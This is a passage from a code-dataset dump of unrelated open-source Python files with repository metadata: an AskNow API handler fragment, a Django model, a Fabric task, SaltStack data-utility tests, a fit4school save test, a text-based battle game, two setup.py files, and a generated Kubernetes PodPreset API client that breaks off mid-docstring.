logging.info('Information successfully retrieved.')
else:
logging.info('Question cannot be answered by AskNow.' +
'Attempting to load entities of the question.')
titles = self.retrieve_entities(question)
answers = self.retrieve_info(titles)
answers['answers'] = []
answers['lenanswers'] = 0
answers['answered'] = False
else:
answers = { 'status': 2, 'message': 'Application needs a q parameter, none given.' }
answers['question'] = query
json_string = json.dumps(answers)
self.response.headers['Content-Type'] = 'application/json; charset=UTF-8'
self.write(json_string)
|
jankohoener/asknow-UI
|
asknow-UI/api.py
|
Python
|
apache-2.0
| 6,797
|
from django.db import models as django_models
from project.models import Project
# Create your models here.
class SupportProject(django_models.Model):
project = django_models.OneToOneField(Project, on_delete=django_models.PROTECT, related_name = "for_support_purposes", unique=True )
|
postpdm/ich_bau
|
support/models.py
|
Python
|
apache-2.0
| 294
|
from fabric.api import *
from fabric.context_managers import *
from fabric.contrib.console import confirm
import os, subprocess, sys, json
lib_path = os.path.abspath(os.path.join('./util'))
sys.path.append(lib_path)
from md_utils import *
local_dir = os.getcwd()
@task
def unittest():
local("python test/md_utils_test.py")
|
walterfan/snippets
|
python/fabfile.py
|
Python
|
apache-2.0
| 337
|
import sys
import pytest
import salt.utils.data
def test_get_value_simple_path():
data = {"a": {"b": {"c": "foo"}}}
assert [{"value": "foo"}] == salt.utils.data.get_value(data, "a:b:c")
@pytest.mark.skipif(
sys.version_info < (3, 6),
reason="Test will randomly fail since Python3.5 does not have ordered dictionaries",
)
def test_get_value_placeholder_dict():
data = {"a": {"b": {"name": "foo"}, "c": {"name": "bar"}}}
assert [
{"value": "foo", "id": "b"},
{"value": "bar", "id": "c"},
] == salt.utils.data.get_value(data, "a:{id}:name")
@pytest.mark.skipif(
sys.version_info < (3, 6),
reason="Test will randomly fail since Python3.5 does not have ordered dictionaries",
)
def test_get_value_placeholder_list():
data = {"a": [{"name": "foo"}, {"name": "bar"}]}
assert [
{"value": "foo", "id": 0},
{"value": "bar", "id": 1},
] == salt.utils.data.get_value(data, "a:{id}:name")
@pytest.mark.skipif(
sys.version_info < (3, 6),
reason="Test will randomly fail since Python3.5 does not have ordered dictionaries",
)
def test_get_value_nested_placeholder():
data = {
"a": {
"b": {"b1": {"name": "foo1"}, "b2": {"name": "foo2"}},
"c": {"c1": {"name": "bar"}},
}
}
assert [
{"value": "foo1", "id": "b", "sub": "b1"},
{"value": "foo2", "id": "b", "sub": "b2"},
{"value": "bar", "id": "c", "sub": "c1"},
] == salt.utils.data.get_value(data, "a:{id}:{sub}:name")
def test_get_value_nested_notfound():
data = {"a": {"b": {"c": "foo"}}}
assert [{"value": []}] == salt.utils.data.get_value(data, "a:b:d", [])
def test_get_value_not_found():
assert [{"value": []}] == salt.utils.data.get_value({}, "a", [])
def test_get_value_none():
assert [{"value": None}] == salt.utils.data.get_value({"a": None}, "a")
def test_get_value_simple_type_path():
assert [{"value": []}] == salt.utils.data.get_value({"a": 1024}, "a:b", [])
def test_get_value_None_path():
assert [{"value": None}] == salt.utils.data.get_value({"a": None}, "a:b", [])
def test_flatten_recursion_error():
"""
Test the flatten function for reference cycle detection
"""
data = [1, 2, 3, [4]]
data.append(data)
with pytest.raises(RecursionError) as err:
salt.utils.data.flatten(data)
assert str(err.value) == "Reference cycle detected. Check input list."
|
saltstack/salt
|
tests/pytests/unit/utils/test_data.py
|
Python
|
apache-2.0
| 2,449
|
import pytest
import mock
from mock import call
import pendulum
from django.utils import timezone
from fit4school.core.models import Tracker, Program, School, Student, Classroom
TZ = pendulum.timezone(timezone.get_current_timezone_name())
@pytest.mark.django_db
@mock.patch("fit4school.core.models.notify_tracker_changes")
@mock.patch("fit4school.core.models.timezone.now")
def test_save_notify(time_now, notify):
fake_now = TZ.convert(timezone.datetime(2018, 2, 4, 23, 9, 37, 122))
time_now.return_value = fake_now
# Creates a tracker object and then set the MAC address
# Test that notify is called
program = Program.objects.create(name='program')
school = School.objects.create(name='school', program=program)
classroom = Classroom.objects.create(name='classroom', school=school, teacher='teacher')
student = Student.objects.create(name='student', classroom=classroom)
tracker = Tracker.objects.create(tracker_id=10, program=program)
mac_addr = "ABCD"
# set the mac
tracker.mac = mac_addr
tracker.save()
# add a student
student.add_tracker(tracker.tracker_id)
assert notify.delay.call_args_list == [
call({
'battery_status': (None, 'U'),
'program': (None, program),
'tracker_count': (None, 0),
'_student': '',
'_tracker_id': 10
}),
call({'mac': (None, mac_addr), '_student': '', '_tracker_id': 10}),
call({
'date_assigned': (None, fake_now),
'_student': 'classroom - teacher - school - student',
'_tracker_id': 10
})
]
|
goodes/fit4school
|
fit4school/core/tests/test_save.py
|
Python
|
apache-2.0
| 1,638
|
import sys,time,functions,getpass # Imports
from random import randint
from config import *
from player import Player
from enemies import *
from states import States
# runs the game
def runGame():
playerClasses = ['Fighter', 'Thief'] # possible player classes
enemyClasses = ['HOF','LOF','DEW','DEC','DEA'] # possible enemy classes (no used)
frontRowPossibilities = ['HOF','LOF'] # possible front row enemy classes
backRowPossibilities = ['DEW','DEC','DEA'] # possible back row enemy classes
commandPossibilities = ['Attack','Defend', 'Save', 'Exit'] # player actions
functions.clearScreen()
print 'Welcome to AI Battle!'
print '------------------------------------------'
print 'Load Game?' # load a previous game?
allEnemies = None
thePlayer = None
load = raw_input('(y/n)> ')
if load.lower() in afermativeStrings:
allEnemies,thePlayer = functions.loadGame() # load a saved game
else:
print 'Please pick your player class! (pick number NOT name)'
while True: # used to pick player classes
for i in range(len(playerClasses)):
print '[' + str(i)+ ']:' + ' ' + playerClasses[i]
try:
playerClassChoice = int(raw_input('>'))
if playerClassChoice >= 0 and playerClassChoice <= len(playerClasses):
break
else:
raise ValueError
except ValueError: # incorrect input
print 'Incorrect Choice! Please Try again!'
thePlayer = Player(playerClasses[playerClassChoice]) # init player
thePlayer.printInfo()
print 'How many enemies do you want to fight?'
while True: # used to pick numbers of enemies
try:
enemyCount = int(raw_input('>'))
break
except ValueError:
continue
frontRowCount = (enemyCount / 2) + 1 # there is always more front row enemies than back row enemies
backRowCount = enemyCount - frontRowCount
functions.endofLine()
print 'Picking Enemies!'
functions.endofLine()
frontRow = [] # init front and back rows
backRow = []
for i in range(frontRowCount): # randomly pick front row enemies
tempEnemyIndex = randint(0,len(frontRowPossibilities)-1)
frontRow.append(Enemy(frontRowPossibilities[tempEnemyIndex],i))
for i in range(backRowCount): # randomly pick back row enemies
tempEnemyIndex = randint(0,len(backRowPossibilities)-1)
backRow.append(Enemy(backRowPossibilities[tempEnemyIndex],i+len(frontRow)))
initState = States('Attack!') # initialize enemey FSM
allEnemies = Enemies(frontRow,backRow,initState) # create enemy team object
sys.stdout.write('Starting Game!')
functions.endofLine()
command = ''
functions.endofLine()
while command.lower() not in exitStrings:
if len(allEnemies.getAllEnemies()) <= 0: # winning condition
print 'YOU WIN!'
break;
elif thePlayer.currentHP <= 0: # losing condition
print 'YOU LOST!'
break;
wait = getpass.getpass('press enter key to continue...') # pauses game
functions.clearScreen()
thePlayer = functions.resetPlayer(thePlayer) # remove buffs and such fom playerr
functions.endofLine()
allEnemies.printEnemies()
functions.endofLine()
thePlayer.printInfoLine()
functions.endofLine()
print 'Commands!'
for i in range(len(commandPossibilities)): # print possible player commands
print '[' + str(i) + '] ' + commandPossibilities[i]
try:
command = int(raw_input('>')) # pick command
if command >= len(commandPossibilities) or command < 0:
raise ValueError
except ValueError: # error checking
functions.tryAgain()
continue
functions.clearScreen()
command = commandPossibilities[command]
if command == 'Attack': # attack command
print 'Attack Who?'
for x in allEnemies.getAllEnemies(): # get target to attack
print '[' + str(x.enemyId) + '] ' + x.enemyType
try:
enemyToAttackID = int(raw_input('>'))
if not allEnemies.validId(enemyToAttackID):
raise ValueError
except ValueError: # error checking
functions.tryAgain()
continue
enemyToAttack = allEnemies.getEnemey(enemyToAttackID)
thePlayer,allEnemies= functions.Attack(thePlayer,enemyToAttack,allEnemies,True)
if command == 'Defend': # defend command
thePlayer = functions.Defend(thePlayer,True)
print 'You are Defending!'
print 'current Stats:'
thePlayer.printInfo('--> ')
if command == 'Save': # save game using pickle
functions.saveGame(allEnemies,thePlayer) # save the current game
break
if command.lower() not in exitStrings: # amke surre the user did not exit
allEnemies.resetEnemies() # reset enemeies (rremove defence buffs and AttackBuff)
allEnemies.removeDeadEnemeies() # RRemove the dead enemies
functions.endofLine()
functions.endofLine()
thePlayer,allEnemies = functions.enemyTurn(thePlayer,allEnemies) # take the enemy turn
functions.endofLine()
if __name__ == "__main__":
runGame() # run the game
|
FireElementalNE/AI-Final-Project
|
src/game.py
|
Python
|
apache-2.0
| 5,609
|
from __future__ import unicode_literals
import re
from setuptools import find_packages, setup
def get_version(filename):
content = open(filename).read()
metadata = dict(re.findall("__([a-z]+)__ = '([^']+)'", content))
return metadata['version']
setup(
name='v2gcalendar',
version=get_version('v2gcalendar/__init__.py'),
url='http://github.com/felixb/v2gcalendar/',
license='Apache License, Version 2.0',
author='Felix Bechstein',
author_email='f@ub0r.de',
description='Upload vcalendar files to your Google calendar',
long_description=open('README.rst').read(),
packages=find_packages(exclude=['tests', 'tests.*']),
zip_safe=False,
include_package_data=True,
install_requires=[
'setuptools',
'icalendar',
'google-api-python-client'
],
entry_points={
'console_scripts': [
'v2gcalendar = v2gcalendar.main:main'
]
},
test_suite='nose.collector',
tests_require=[
'nose',
'mock >= 1.0',
],
)
|
felixb/v2gcalendar
|
setup.py
|
Python
|
apache-2.0
| 1,044
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import find_packages, setup
setup(name='cardisco',
version='1.0',
description='HTML Autodiscovery Library',
author='Mark Lee',
packages=find_packages(),
install_requires=[
'html5lib',
'httplib2',
])
|
devhub/cardisco
|
setup.py
|
Python
|
apache-2.0
| 319
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class SettingsV1alpha1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_namespaced_pod_preset(self, namespace, body, **kwargs):
"""
create a PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_namespaced_pod_preset(namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1PodPreset body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_namespaced_pod_preset_with_http_info(namespace, body, **kwargs)
else:
(data) = self.create_namespaced_pod_preset_with_http_info(namespace, body, **kwargs)
return data
def create_namespaced_pod_preset_with_http_info(self, namespace, body, **kwargs):
"""
create a PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_namespaced_pod_preset_with_http_info(namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1PodPreset body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_pod_preset`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPreset',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_pod_preset(self, namespace, **kwargs):
"""
delete collection of PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_collection_namespaced_pod_preset(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_collection_namespaced_pod_preset_with_http_info(namespace, **kwargs)
else:
(data) = self.delete_collection_namespaced_pod_preset_with_http_info(namespace, **kwargs)
return data
def delete_collection_namespaced_pod_preset_with_http_info(self, namespace, **kwargs):
"""
delete collection of PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_collection_namespaced_pod_preset_with_http_info(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_pod_preset(self, name, namespace, body, **kwargs):
"""
delete a PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_namespaced_pod_preset(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.delete_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
return data
def delete_namespaced_pod_preset_with_http_info(self, name, namespace, body, **kwargs):
"""
delete a PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_namespaced_pod_preset_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_pod_preset`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_pod_preset`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
if 'propagation_policy' in params:
query_params['propagationPolicy'] = params['propagation_policy']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_api_resources(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: V1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_api_resources_with_http_info(**kwargs)
return data
def get_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_api_resources_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: V1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1APIResourceList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_namespaced_pod_preset(self, namespace, **kwargs):
"""
list or watch objects of kind PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_namespaced_pod_preset(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1PodPresetList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_namespaced_pod_preset_with_http_info(namespace, **kwargs)
else:
(data) = self.list_namespaced_pod_preset_with_http_info(namespace, **kwargs)
return data
def list_namespaced_pod_preset_with_http_info(self, namespace, **kwargs):
"""
list or watch objects of kind PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_namespaced_pod_preset_with_http_info(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1PodPresetList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPresetList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_pod_preset_for_all_namespaces(self, **kwargs):
"""
list or watch objects of kind PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_pod_preset_for_all_namespaces(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
